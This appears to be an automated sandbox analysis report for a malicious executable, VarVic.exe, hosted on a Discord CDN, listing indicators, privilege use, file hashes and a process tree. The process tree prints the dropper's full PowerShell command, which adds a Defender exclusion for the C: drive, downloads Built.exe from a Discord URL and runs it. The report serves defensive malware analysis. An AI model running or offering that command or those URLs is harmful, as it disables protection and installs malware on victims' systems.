hxxps://cdn[.]discordapp[.]com/attachments/1168126855291879436/1168631063657074788/VarVic[.]exe

Analysis

max time kernel
196s
max time network
198s
platform
windows10-1703_x64
resource
win10-20231020-en
resource tags

arch:x64arch:x86image:win10-20231020-enlocale:en-usos:windows10-1703-x64system
submitted
30/10/2023, 19:23

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

https://cdn.discordapp.com/attachments/1168126855291879436/1168631063657074788/VarVic.exe

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://cdn.discordapp.com/attachments/1168563508900810782/1168570217308360704/Built.exe

Signatures

Downloads MZ/PE file

Executes dropped EXE 1 IoCs

pid	Process
1876	VarVic.exe

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2640874492-649017405-3475600720-1000_Classes\Local Settings	firefox.exe

NTFS ADS 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\Downloads\VarVic.exe:Zone.Identifier	firefox.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
4016	powershell.exe
4016	powershell.exe
4016	powershell.exe

Suspicious use of AdjustPrivilegeToken 28 IoCs

description	pid	Process
Token: SeDebugPrivilege	5032	firefox.exe
Token: SeDebugPrivilege	5032	firefox.exe
Token: SeDebugPrivilege	5032	firefox.exe
Token: SeDebugPrivilege	5032	firefox.exe
Token: SeDebugPrivilege	5032	firefox.exe
Token: SeDebugPrivilege	4016	powershell.exe
Token: SeIncreaseQuotaPrivilege	4016	powershell.exe
Token: SeSecurityPrivilege	4016	powershell.exe
Token: SeTakeOwnershipPrivilege	4016	powershell.exe
Token: SeLoadDriverPrivilege	4016	powershell.exe
Token: SeSystemProfilePrivilege	4016	powershell.exe
Token: SeSystemtimePrivilege	4016	powershell.exe
Token: SeProfSingleProcessPrivilege	4016	powershell.exe
Token: SeIncBasePriorityPrivilege	4016	powershell.exe
Token: SeCreatePagefilePrivilege	4016	powershell.exe
Token: SeBackupPrivilege	4016	powershell.exe
Token: SeRestorePrivilege	4016	powershell.exe
Token: SeShutdownPrivilege	4016	powershell.exe
Token: SeDebugPrivilege	4016	powershell.exe
Token: SeSystemEnvironmentPrivilege	4016	powershell.exe
Token: SeRemoteShutdownPrivilege	4016	powershell.exe
Token: SeUndockPrivilege	4016	powershell.exe
Token: SeManageVolumePrivilege	4016	powershell.exe
Token: SeImpersonatePrivilege	4016	powershell.exe
Token: 33	4016	powershell.exe
Token: 34	4016	powershell.exe
Token: 35	4016	powershell.exe
Token: 36	4016	powershell.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe

Suspicious use of SetWindowsHookEx 49 IoCs

pid	Process
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe
5032	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1832 wrote to memory of 5032	1832	firefox.exe	70
PID 1832 wrote to memory of 5032	1832	firefox.exe	70
PID 1832 wrote to memory of 5032	1832	firefox.exe	70
PID 1832 wrote to memory of 5032	1832	firefox.exe	70
PID 1832 wrote to memory of 5032	1832	firefox.exe	70
PID 1832 wrote to memory of 5032	1832	firefox.exe	70
PID 1832 wrote to memory of 5032	1832	firefox.exe	70
PID 1832 wrote to memory of 5032	1832	firefox.exe	70
PID 1832 wrote to memory of 5032	1832	firefox.exe	70
PID 1832 wrote to memory of 5032	1832	firefox.exe	70
PID 1832 wrote to memory of 5032	1832	firefox.exe	70
PID 5032 wrote to memory of 916	5032	firefox.exe	71
PID 5032 wrote to memory of 916	5032	firefox.exe	71
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 1772	5032	firefox.exe	72
PID 5032 wrote to memory of 224	5032	firefox.exe	73
PID 5032 wrote to memory of 224	5032	firefox.exe	73
PID 5032 wrote to memory of 224	5032	firefox.exe	73

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://cdn.discordapp.com/attachments/1168126855291879436/1168631063657074788/VarVic.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1832
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://cdn.discordapp.com/attachments/1168126855291879436/1168631063657074788/VarVic.exe
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - NTFS ADS
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:5032
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5032.0.1543448695\1533428779" -parentBuildID 20221007134813 -prefsHandle 1700 -prefMapHandle 1688 -prefsLen 20858 -prefMapSize 232645 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f9349269-886b-40c8-b4b3-c1a0c7936488} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" 1792 1f8e8b04a58 gpu
    3⤵
    PID:916
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5032.1.842179674\261230262" -parentBuildID 20221007134813 -prefsHandle 2140 -prefMapHandle 2136 -prefsLen 21719 -prefMapSize 232645 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ebdead08-bcbd-4112-849a-f5dba0f79760} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" 2152 1f8d5775e58 socket
    3⤵
    PID:1772
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5032.2.1028953411\378856927" -childID 1 -isForBrowser -prefsHandle 2880 -prefMapHandle 3048 -prefsLen 21757 -prefMapSize 232645 -jsInitHandle 1316 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f9d9dfa-116a-464d-ba0c-6a945d094405} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" 2872 1f8ebe3a958 tab
    3⤵
    PID:224
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5032.3.476243884\1942230642" -childID 2 -isForBrowser -prefsHandle 3568 -prefMapHandle 3564 -prefsLen 26402 -prefMapSize 232645 -jsInitHandle 1316 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c8f35d13-0af4-4295-b356-50797a4f3b88} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" 3576 1f8ea4c1c58 tab
    3⤵
    PID:4396
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5032.4.761675743\1613700469" -childID 3 -isForBrowser -prefsHandle 5016 -prefMapHandle 5004 -prefsLen 26676 -prefMapSize 232645 -jsInitHandle 1316 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {573af251-63cc-481f-a382-47efedf742d9} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" 5012 1f8ef234158 tab
    3⤵
    PID:776
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5032.6.2006790613\675797146" -childID 5 -isForBrowser -prefsHandle 5364 -prefMapHandle 5368 -prefsLen 26676 -prefMapSize 232645 -jsInitHandle 1316 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {13d834f2-b34a-4f90-90f5-b77bbeb88158} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" 5356 1f8ef235058 tab
    3⤵
    PID:2936
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5032.5.73376744\1291401832" -childID 4 -isForBrowser -prefsHandle 5156 -prefMapHandle 5160 -prefsLen 26676 -prefMapSize 232645 -jsInitHandle 1316 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a08d200e-5570-4a26-b947-13164548e4a8} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" 5148 1f8ef235c58 tab
    3⤵
    PID:4176
- - C:\Users\Admin\Downloads\VarVic.exe
    "C:\Users\Admin\Downloads\VarVic.exe"
    3⤵
    - Executes dropped EXE
    PID:1876
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp74F3.tmp.bat""
      4⤵
      PID:4576
    - - C:\Windows\system32\fsutil.exe
        
        fsutil dirty query C:
        5⤵
        
        PID:4012
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -w hidden -c Add-MpPreference -ExclusionPath "C:";Start-BitsTransfer -Source "https://cdn.discordapp.com/attachments/1168563508900810782/1168570217308360704/Built.exe" -Destination "C:\Built.exe";Invoke-expression "C:\Built.exe"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4016

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1foor6be.default-release\activity-stream.discovery_stream.json.tmp

Filesize
22KB

MD5
80958922bfc135a8e25548a41f6da3f0

SHA1
28489dd863e0851d5f6a1738837940c601d57f6b

SHA256
211411019f35b879e5f9c0b246e1645994d9479503a4d7ad0e4ef3f01cae33ed

SHA512
253c6b944915fdceb8bb7d00b4bafd22b18df0f07c52509c1163f13dd1aeaa7d5fa1d9ed43baa43e7540bd6458bb010d03aa957cae39b4a7715197d398667cc7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_drqf0e4j.oan.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp74F3.tmp.bat

Filesize
586B

MD5
0b192e0b29574de8d2190b451222cef3

SHA1
2b44d10e2cd23d5d93b305c21bb52eefef4b832b

SHA256
c202a447805fa7b12146edd264ce762e4aeb71358a25b16275387cfd9c11b253

SHA512
e097e39d9b65dc5beab0a7e03cf5da79c204736ba578cde7442756b48dff9f948305ca244b6d23e4d9abfdf29db2c3c0d5ea40b16e6eb7f5a55df6613dd49400

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1foor6be.default-release\prefs-1.js

Filesize
7KB

MD5
938c3b7611f6efd3bbbd8cd02a95b854

SHA1
7b797a5d7676d3732f68a3c8d98bb7cb53655a45

SHA256
db87395b760d8b046b384226a3000ad4f1deddddbe0d0e18dcd32f3e988cbc80

SHA512
1d18901ebdcef00f346733cfd676edaf8124997a154c40f837acef8437efb2fea1719271deef05e6fd1c2adb3b4bcdbbbc1838090631215355fa284a7d0a55c0

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1foor6be.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
1KB

MD5
8d22a4868d1440cbeed467a35ea0297b

SHA1
40e14d3dcf59238d74953d279440e36623e5e500

SHA256
ac86f3ac34d3761478efc65322d6faf4e0b3d8bbb0025911b6b539bf658b24fc

SHA512
18b103080e55684f6a79324d191c7cc4b9b623e2df538faee8f177737de8e253da70572f9bf3b64a82eb659e10614aa87e62d313a325d85f6fb3037112a5436d

Download Submit
C:\Users\Admin\Downloads\VarVic.exe

Filesize
5KB

MD5
f6f9d5b2a02fd9da0a1a9fe154915a48

SHA1
6b82e8e7e060417aea48568318d923809e1d251e

SHA256
a94ded43dd4a46d0f337a97283db67baf85113b8a8125392b31b6738ba819add

SHA512
f3673b35cfe9d0d3ea3b338ee264bb3283a1472d237fea9582c614fdcb54caf6ec0ffb7adcf6ff36fa149b6b45f1cb473820af8d269635620e6ef2a22f09d1f3

Download Submit
C:\Users\Admin\Downloads\VarVic.exe

Filesize
5KB

MD5
f6f9d5b2a02fd9da0a1a9fe154915a48

SHA1
6b82e8e7e060417aea48568318d923809e1d251e

SHA256
a94ded43dd4a46d0f337a97283db67baf85113b8a8125392b31b6738ba819add

SHA512
f3673b35cfe9d0d3ea3b338ee264bb3283a1472d237fea9582c614fdcb54caf6ec0ffb7adcf6ff36fa149b6b45f1cb473820af8d269635620e6ef2a22f09d1f3

Download Submit
C:\Users\Admin\Downloads\VarVic.exe

Filesize
5KB

MD5
f6f9d5b2a02fd9da0a1a9fe154915a48

SHA1
6b82e8e7e060417aea48568318d923809e1d251e

SHA256
a94ded43dd4a46d0f337a97283db67baf85113b8a8125392b31b6738ba819add

SHA512
f3673b35cfe9d0d3ea3b338ee264bb3283a1472d237fea9582c614fdcb54caf6ec0ffb7adcf6ff36fa149b6b45f1cb473820af8d269635620e6ef2a22f09d1f3

Download Submit
memory/1876-140-0x00000000001E0000-0x00000000001E8000-memory.dmp

Filesize
32KB

Download
memory/1876-145-0x00007FFAECB40000-0x00007FFAED52C000-memory.dmp

Filesize
9.9MB

Download
memory/1876-335-0x00007FFAECB40000-0x00007FFAED52C000-memory.dmp

Filesize
9.9MB

Download
memory/4016-150-0x000002101F840000-0x000002101F850000-memory.dmp

Filesize
64KB

Download
memory/4016-152-0x000002101F850000-0x000002101F872000-memory.dmp

Filesize
136KB

Download
memory/4016-157-0x000002101FA00000-0x000002101FA76000-memory.dmp

Filesize
472KB

Download
memory/4016-151-0x000002101F840000-0x000002101F850000-memory.dmp

Filesize
64KB

Download
memory/4016-170-0x000002101F840000-0x000002101F850000-memory.dmp

Filesize
64KB

Download
memory/4016-193-0x000002101F840000-0x000002101F850000-memory.dmp

Filesize
64KB

Download
memory/4016-260-0x000002101FD80000-0x000002101FDA2000-memory.dmp

Filesize
136KB

Download
memory/4016-299-0x000002101FF10000-0x000002101FF22000-memory.dmp

Filesize
72KB

Download
memory/4016-333-0x00007FFAECB40000-0x00007FFAED52C000-memory.dmp

Filesize
9.9MB

Download
memory/4016-148-0x00007FFAECB40000-0x00007FFAED52C000-memory.dmp

Filesize
9.9MB

Download